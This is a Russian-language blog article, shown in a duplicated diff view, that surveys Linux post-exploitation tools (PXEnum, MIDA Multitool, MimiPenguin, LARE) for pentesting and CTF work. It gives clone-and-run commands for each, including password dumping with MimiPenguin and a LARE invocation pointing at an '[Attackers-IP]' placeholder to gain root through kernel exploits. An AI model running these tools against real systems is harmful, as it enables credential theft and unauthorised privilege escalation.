0 added
0 removed
Original
2026-01-01
Modified
2026-03-10
1
<p><strong>Пост-эксплуатация</strong>(англ. post-explotation) - это то, что можно сделать с целевой системой после того, как удалось найти уязвимость и выполнить какой-то участок кода на целевой системе. Также под этим термином понимается один из этапов взлома компьютерных систем (фаза) позволяющая собирать дальнейшую информацию о целевой системе, получить дальнейший доступ к сети и хранящимся данным. Фаза пост-эксплуатации позволяет идентифицировать такие вещи, как дополнительные подсети, маршрутизаторы, названия серверов, сетевых служб и установленных приложений.</p>
1
<p><strong>Пост-эксплуатация</strong>(англ. post-explotation) - это то, что можно сделать с целевой системой после того, как удалось найти уязвимость и выполнить какой-то участок кода на целевой системе. Также под этим термином понимается один из этапов взлома компьютерных систем (фаза) позволяющая собирать дальнейшую информацию о целевой системе, получить дальнейший доступ к сети и хранящимся данным. Фаза пост-эксплуатации позволяет идентифицировать такие вещи, как дополнительные подсети, маршрутизаторы, названия серверов, сетевых служб и установленных приложений.</p>
2
<p><em>Фазы (этапы) проведения тестирования на проникновение:</em></p>
2
<p><em>Фазы (этапы) проведения тестирования на проникновение:</em></p>
3
<p><strong>Основные паттерны, по которым работают злоумышленники на этапе пост-эксплуатации:</strong>- получить доступ на выполнение произвольного кода\команд; - изучение данных, хранящихся на сервере; - перехват данных, которых нет на системе сейчас, но они могут появиться в будущем; - организация перманентного доступа к целевой системе; - эскалация привилегий до уровня системы для непривилегированной учётной записи.</p>
3
<p><strong>Основные паттерны, по которым работают злоумышленники на этапе пост-эксплуатации:</strong>- получить доступ на выполнение произвольного кода\команд; - изучение данных, хранящихся на сервере; - перехват данных, которых нет на системе сейчас, но они могут появиться в будущем; - организация перманентного доступа к целевой системе; - эскалация привилегий до уровня системы для непривилегированной учётной записи.</p>
4
<p><strong>Дополнительно, хакер может получать информацию о скомпрометированной системе, анализируя следующие параметры</strong>: - конфигурацию системы (логин и пароль к БД в исходных кодах); - конфигурацию веб-сервера (например, httpd.conf, .htaccess); - исходные коды приложения (поиск уязвимостей, анализируя логику приложения); - доступы к окружению (находясь внутри сети, может быть проще попасть на соседние серверы и изолированные сегменты подсети); - базы данных (аутентификационная информация к другим системам, хранящаяся в них).</p>
4
<p><strong>Дополнительно, хакер может получать информацию о скомпрометированной системе, анализируя следующие параметры</strong>: - конфигурацию системы (логин и пароль к БД в исходных кодах); - конфигурацию веб-сервера (например, httpd.conf, .htaccess); - исходные коды приложения (поиск уязвимостей, анализируя логику приложения); - доступы к окружению (находясь внутри сети, может быть проще попасть на соседние серверы и изолированные сегменты подсети); - базы данных (аутентификационная информация к другим системам, хранящаяся в них).</p>
5
<h2>Обзор инструментов пост-эксплуатации</h2>
5
<h2>Обзор инструментов пост-эксплуатации</h2>
6
<p>Мы же в материале сделаем акцент на рассмотрении инструментов пост-эксплуатации исключительно под<strong>Linux-системы</strong>.</p>
6
<p>Мы же в материале сделаем акцент на рассмотрении инструментов пост-эксплуатации исключительно под<strong>Linux-системы</strong>.</p>
7
<h3>1. PXEenum - полное перечисление всего, что есть в системе</h3>
7
<h3>1. PXEenum - полное перечисление всего, что есть в системе</h3>
8
<p>Основной задачей данного скрипта является функция перечисления (англ. - Enumeration). Он вытаскивает всю доступную информацию о системе. Данный скрипт создан, если не сказать, что создан для лентяев, то для тех, кто ценит свое время.</p>
8
<p>Основной задачей данного скрипта является функция перечисления (англ. - Enumeration). Он вытаскивает всю доступную информацию о системе. Данный скрипт создан, если не сказать, что создан для лентяев, то для тех, кто ценит свое время.</p>
9
<p><em>Запуск PXEenum:</em></p>
9
<p><em>Запуск PXEenum:</em></p>
10
<p>Для запуска он не требует прав root'а, работает в стандартном терминале.</p>
10
<p>Для запуска он не требует прав root'а, работает в стандартном терминале.</p>
11
# wget https://raw.githubusercontent.com/shawnduong/PXEnum/master/PXEnume.sh<p><strong>Установка</strong>:</p>
11
# wget https://raw.githubusercontent.com/shawnduong/PXEnum/master/PXEnume.sh<p><strong>Установка</strong>:</p>
12
# git clone https://github.com/shawnduong/PXEnum.git # cd PXEnum/ # chmod +x PXEnum.sh # bash PXEnum.sh<p><em>Вывод результатов перечисления в PXEenum:</em></p>
12
# git clone https://github.com/shawnduong/PXEnum.git # cd PXEnum/ # chmod +x PXEnum.sh # bash PXEnum.sh<p><em>Вывод результатов перечисления в PXEenum:</em></p>
13
<h3>2. MIDA Multitool - палим систему по-взрослому</h3>
13
<h3>2. MIDA Multitool - палим систему по-взрослому</h3>
14
<p>Другой интересный инструмент -<a>MIDA Multitool</a>, созданный на базе менее именитых собратьев<strong>SysEnum</strong>и<strong>RootHelper</strong>, но включающий в себя гораздо больший функционал. По воле разработчика функционал MIDA Multitool включает в себя отдельные функции своих предшественников под одним капотом, а именно:</p>
14
<p>Другой интересный инструмент -<a>MIDA Multitool</a>, созданный на базе менее именитых собратьев<strong>SysEnum</strong>и<strong>RootHelper</strong>, но включающий в себя гораздо больший функционал. По воле разработчика функционал MIDA Multitool включает в себя отдельные функции своих предшественников под одним капотом, а именно:</p>
15
<ul><li><strong>SysEnum</strong>- Bash-скрипт, предназначенный для получения основной информацию о системе, включая, но не ограничиваясь следующими данными - текущий пользователь, IP-конфигурация, таблицы ARP, запущенные процессы и т. д.;</li>
15
<ul><li><strong>SysEnum</strong>- Bash-скрипт, предназначенный для получения основной информацию о системе, включая, но не ограничиваясь следующими данными - текущий пользователь, IP-конфигурация, таблицы ARP, запущенные процессы и т. д.;</li>
16
<li><strong>Roothelper</strong>- призван помочь в процессе эскалации привилегий в системе, которая была скомпрометирована, путем выполнения ряда перечислений и использования доверительных сценариев.</li>
16
<li><strong>Roothelper</strong>- призван помочь в процессе эскалации привилегий в системе, которая была скомпрометирована, путем выполнения ряда перечислений и использования доверительных сценариев.</li>
17
</ul><p><em>Стартовое окно MIDA Multitool:</em></p>
17
</ul><p><em>Стартовое окно MIDA Multitool:</em></p>
18
<p><strong>Устанавливаем скрипт в систему с github</strong>:</p>
18
<p><strong>Устанавливаем скрипт в систему с github</strong>:</p>
19
# git clone https://github.com/NullArray/Bash-Kit-Multitool # cd Bash-Kit-Multitool # chmod +x bashkit.sh<p><strong>Запускаем скрипт</strong>:</p>
19
# git clone https://github.com/NullArray/Bash-Kit-Multitool # cd Bash-Kit-Multitool # chmod +x bashkit.sh<p><strong>Запускаем скрипт</strong>:</p>
20
<p>Дело сделано! Можно запускать в системе!</p>
20
<p>Дело сделано! Можно запускать в системе!</p>
21
<h3>3. MimiPenguin - добываем пароли без зазрения совести</h3>
21
<h3>3. MimiPenguin - добываем пароли без зазрения совести</h3>
22
<p>Очень хорошо известный скрипт в узких кругах пентестеров под названием<a>MimiPenguin</a>. Основной задачей утилиты служит сброса пароля на вход в систему от текущего пользователя Linux. Если такое сравнение возможно, то это аналог утилиты<a>mimikatz</a>для дампа пароля в Windows-системах.</p>
22
<p>Очень хорошо известный скрипт в узких кругах пентестеров под названием<a>MimiPenguin</a>. Основной задачей утилиты служит сброса пароля на вход в систему от текущего пользователя Linux. Если такое сравнение возможно, то это аналог утилиты<a>mimikatz</a>для дампа пароля в Windows-системах.</p>
23
<p><em>Запуск MimiPenguin:</em></p>
23
<p><em>Запуск MimiPenguin:</em></p>
24
<p>Кроме того,<strong>MimiPenguin</strong>поддерживает такие приложения, как VSFTPd (активные подключения клиента FTP), популярнейший web-сервер Apache2 (активные/старые сеансы<strong>HTTP BASIC AUTH</strong>, но для этого требуется Gcore) и openssh-сервер (активные подключения SSH с использованием команды sudo). И вообще, необходимо сказать, что MimiPenguin часто становится частью эксплойтов под Linux.</p>
24
<p>Кроме того,<strong>MimiPenguin</strong>поддерживает такие приложения, как VSFTPd (активные подключения клиента FTP), популярнейший web-сервер Apache2 (активные/старые сеансы<strong>HTTP BASIC AUTH</strong>, но для этого требуется Gcore) и openssh-сервер (активные подключения SSH с использованием команды sudo). И вообще, необходимо сказать, что MimiPenguin часто становится частью эксплойтов под Linux.</p>
25
<p><em>Результат работы MimiPenguin:</em></p>
25
<p><em>Результат работы MimiPenguin:</em></p>
26
<p><strong>Устанавливаем MimiPenguin, забирая его с репозитория GitHub:</strong></p>
26
<p><strong>Устанавливаем MimiPenguin, забирая его с репозитория GitHub:</strong></p>
27
# git clone https://github.com/huntergregal/mimipenguin # cd mimipenguin # ls -a # chmod +x mimipenguin.sh # ./mimipenguin.sh<p><em>Все пароли как на ладони благодаря MimiPenguin:</em></p>
27
# git clone https://github.com/huntergregal/mimipenguin # cd mimipenguin # ls -a # chmod +x mimipenguin.sh # ./mimipenguin.sh<p><em>Все пароли как на ладони благодаря MimiPenguin:</em></p>
28
<h3>4. LARE - прикидываемся рутом, используя баги ядра</h3>
28
<h3>4. LARE - прикидываемся рутом, используя баги ядра</h3>
29
<p>И, напоследок, ещё один довольно простой скрипт, который помогает с помощью использования известных уязвимостей в ядре ОС получать привилегии root удалённо с атакующей машины. Скрипт использует локальные эксплойты для получения root-прав для версий ядра Linux Kernel v2.6-v4.8.</p>
29
<p>И, напоследок, ещё один довольно простой скрипт, который помогает с помощью использования известных уязвимостей в ядре ОС получать привилегии root удалённо с атакующей машины. Скрипт использует локальные эксплойты для получения root-прав для версий ядра Linux Kernel v2.6-v4.8.</p>
30
<p>Кстати, эта тулза очень часто находит своё применение на сертификационном экзамене OSCP.</p>
30
<p>Кстати, эта тулза очень часто находит своё применение на сертификационном экзамене OSCP.</p>
31
<p><strong>Устанавливаем скрипт в систему</strong>:</p>
31
<p><strong>Устанавливаем скрипт в систему</strong>:</p>
32
# git clone https://github.com/EnigmaDimitri/LARE && cd LARE # chmod +x LARA.sh # LARE.sh -a<p><em>Стартовое окно LARE:</em></p>
32
# git clone https://github.com/EnigmaDimitri/LARE && cd LARE # chmod +x LARA.sh # LARE.sh -a<p><em>Стартовое окно LARE:</em></p>
33
<p><strong>Запуск скрипта на целевой машине в сети</strong>:</p>
33
<p><strong>Запуск скрипта на целевой машине в сети</strong>:</p>
34
# LARE.sh -l [Attackers-IP]<p><strong>Запуск на машине с подключением к базе данных эксплойтов на GitHub</strong>:</p>
34
# LARE.sh -l [Attackers-IP]<p><strong>Запуск на машине с подключением к базе данных эксплойтов на GitHub</strong>:</p>
35
# LARE.sh -l or ./LARE.sh -l<p><em>Права root получены!</em></p>
35
# LARE.sh -l or ./LARE.sh -l<p><em>Права root получены!</em></p>
36
<h2>Заключение</h2>
36
<h2>Заключение</h2>
37
<p>Сегодня мы кратко рассмотрели самые популярные и проверенные в практике пентеста рабочие инструменты, используемые на фазе пост-эксплуатации для серверов под управлением Linux. Как видите,<strong>нет ничего абсолютно защищённого</strong>. Эти знания, я надеюсь, пригодятся вам и на CTF, и для пентеста корпоративной сети вашего проекта, и для развития общего понимания практики обеспечения реальной ИБ.</p>
37
<p>Сегодня мы кратко рассмотрели самые популярные и проверенные в практике пентеста рабочие инструменты, используемые на фазе пост-эксплуатации для серверов под управлением Linux. Как видите,<strong>нет ничего абсолютно защищённого</strong>. Эти знания, я надеюсь, пригодятся вам и на CTF, и для пентеста корпоративной сети вашего проекта, и для развития общего понимания практики обеспечения реальной ИБ.</p>
38
<p>На этом сегодня всё! Удачи, друзья, берегите себя, близких и свои данные!</p>
38
<p>На этом сегодня всё! Удачи, друзья, берегите себя, близких и свои данные!</p>
39
39